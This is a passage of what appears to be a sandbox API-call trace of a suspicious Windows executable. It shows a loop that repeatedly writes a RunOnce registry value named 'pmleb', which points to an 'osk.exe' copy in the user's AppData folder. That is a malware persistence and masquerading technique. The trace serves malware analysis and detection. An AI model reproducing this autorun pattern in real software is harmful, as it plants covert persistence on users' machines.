lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.404] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.405] RegCloseKey (hKey=0x280) returned 0x0 [0093.405] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.405] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.405] SetTimer (hWnd=0x20280, nIDEvent=0x2234, uElapse=0xa, lpTimerFunc=0x0) returned 0x2234 [0093.405] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.418] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.418] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.419] KillTimer (hWnd=0x20280, uIDEvent=0x2234) returned 1 [0093.419] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.419] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.419] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.420] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.420] RegCloseKey (hKey=0x280) returned 0x0 [0093.420] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.420] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0093.420] SetTimer (hWnd=0x20280, nIDEvent=0x2235, uElapse=0xa, lpTimerFunc=0x0) returned 0x2235 [0093.420] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.435] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.435] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.435] KillTimer (hWnd=0x20280, uIDEvent=0x2235) returned 1 [0093.435] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.436] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.436] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.436] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.436] RegCloseKey (hKey=0x280) returned 0x0 [0093.436] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.436] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.436] SetTimer (hWnd=0x20280, nIDEvent=0x2236, uElapse=0xa, lpTimerFunc=0x0) returned 0x2236 [0093.436] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.449] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.449] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.450] KillTimer (hWnd=0x20280, uIDEvent=0x2236) returned 1 [0093.450] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.450] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.450] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.451] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.451] RegCloseKey (hKey=0x280) returned 0x0 [0093.451] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.451] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.451] SetTimer (hWnd=0x20280, nIDEvent=0x2237, uElapse=0xa, lpTimerFunc=0x0) returned 0x2237 [0093.451] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.465] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.465] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.465] KillTimer (hWnd=0x20280, uIDEvent=0x2237) returned 1 [0093.466] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.466] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.466] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.466] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.466] RegCloseKey (hKey=0x280) returned 0x0 [0093.467] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.467] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.467] SetTimer (hWnd=0x20280, nIDEvent=0x2238, uElapse=0xa, lpTimerFunc=0x0) returned 0x2238 
[0093.467] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.481] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.481] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.481] KillTimer (hWnd=0x20280, uIDEvent=0x2238) returned 1 [0093.481] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.481] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.481] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.482] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.482] RegCloseKey (hKey=0x280) returned 0x0 [0093.482] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.482] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.482] SetTimer (hWnd=0x20280, nIDEvent=0x2239, uElapse=0xa, lpTimerFunc=0x0) returned 0x2239 [0093.482] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.496] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.496] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.496] KillTimer (hWnd=0x20280, uIDEvent=0x2239) returned 1 [0093.497] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.497] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.497] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.498] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.498] RegCloseKey (hKey=0x280) returned 0x0 [0093.498] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.498] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.498] SetTimer (hWnd=0x20280, nIDEvent=0x223a, uElapse=0xa, lpTimerFunc=0x0) returned 0x223a [0093.498] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.512] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.512] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.512] KillTimer (hWnd=0x20280, uIDEvent=0x223a) returned 1 [0093.512] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.513] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.513] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.513] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.513] RegCloseKey (hKey=0x280) returned 0x0 [0093.513] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.513] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.514] SetTimer (hWnd=0x20280, nIDEvent=0x223b, uElapse=0xa, lpTimerFunc=0x0) returned 0x223b [0093.514] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0093.527] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.527] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.528] KillTimer (hWnd=0x20280, uIDEvent=0x223b) returned 1 [0093.528] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.528] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.529] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.529] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.529] RegCloseKey (hKey=0x280) returned 0x0 [0093.529] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.529] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.529] SetTimer (hWnd=0x20280, nIDEvent=0x223c, uElapse=0xa, lpTimerFunc=0x0) returned 0x223c [0093.529] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.543] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.543] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.543] KillTimer (hWnd=0x20280, uIDEvent=0x223c) returned 1 [0093.544] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.544] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.544] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.544] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.544] RegCloseKey (hKey=0x280) returned 0x0 [0093.545] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.545] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.545] SetTimer (hWnd=0x20280, nIDEvent=0x223d, uElapse=0xa, lpTimerFunc=0x0) returned 0x223d [0093.545] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.559] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.559] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.559] KillTimer (hWnd=0x20280, uIDEvent=0x223d) returned 1 [0093.559] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.560] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.560] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.560] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.560] RegCloseKey (hKey=0x280) returned 0x0 [0093.560] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.560] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.560] SetTimer (hWnd=0x20280, nIDEvent=0x223e, uElapse=0xa, lpTimerFunc=0x0) returned 0x223e [0093.560] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.575] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.575] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.575] KillTimer (hWnd=0x20280, uIDEvent=0x223e) returned 1 [0093.575] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.576] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.576] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.576] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.576] RegCloseKey (hKey=0x280) returned 0x0 [0093.576] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.576] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.576] SetTimer (hWnd=0x20280, nIDEvent=0x223f, uElapse=0xa, lpTimerFunc=0x0) returned 0x223f [0093.577] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.590] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.590] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.590] KillTimer (hWnd=0x20280, uIDEvent=0x223f) returned 1 [0093.590] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.591] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.591] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.591] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.591] RegCloseKey (hKey=0x280) returned 0x0 [0093.591] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.591] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.591] SetTimer (hWnd=0x20280, nIDEvent=0x2240, uElapse=0xa, lpTimerFunc=0x0) returned 0x2240 [0093.591] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.605] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.605] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.606] KillTimer (hWnd=0x20280, uIDEvent=0x2240) returned 1 [0093.606] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.606] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.606] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.607] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.607] RegCloseKey (hKey=0x280) returned 0x0 [0093.607] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.607] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.607] SetTimer (hWnd=0x20280, nIDEvent=0x2241, uElapse=0xa, lpTimerFunc=0x0) returned 0x2241 [0093.607] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.621] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.621] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.621] KillTimer (hWnd=0x20280, 
uIDEvent=0x2241) returned 1 [0093.622] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.622] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.623] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.623] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.623] RegCloseKey (hKey=0x280) returned 0x0 [0093.623] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.623] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.623] SetTimer (hWnd=0x20280, nIDEvent=0x2242, uElapse=0xa, lpTimerFunc=0x0) returned 0x2242 [0093.623] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.637] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.637] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.637] KillTimer (hWnd=0x20280, uIDEvent=0x2242) returned 1 [0093.637] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.638] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.638] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.638] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.638] RegCloseKey (hKey=0x280) returned 0x0 [0093.638] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.638] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.638] SetTimer (hWnd=0x20280, nIDEvent=0x2243, uElapse=0xa, lpTimerFunc=0x0) returned 0x2243 [0093.639] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.678] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.678] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.678] KillTimer (hWnd=0x20280, uIDEvent=0x2243) returned 1 [0093.678] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.679] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.679] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.679] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.679] RegCloseKey (hKey=0x280) returned 0x0 [0093.679] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.679] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.680] SetTimer (hWnd=0x20280, nIDEvent=0x2244, uElapse=0xa, lpTimerFunc=0x0) returned 0x2244 [0093.680] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.685] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.685] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.685] KillTimer (hWnd=0x20280, uIDEvent=0x2244) returned 1 [0093.686] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0093.686] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.686] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.686] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.686] RegCloseKey (hKey=0x280) returned 0x0 [0093.687] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.687] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.687] SetTimer (hWnd=0x20280, nIDEvent=0x2245, uElapse=0xa, lpTimerFunc=0x0) returned 0x2245 [0093.687] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.699] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.699] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.699] KillTimer (hWnd=0x20280, uIDEvent=0x2245) returned 1 [0093.699] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.700] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.700] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.700] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.700] RegCloseKey (hKey=0x280) returned 0x0 
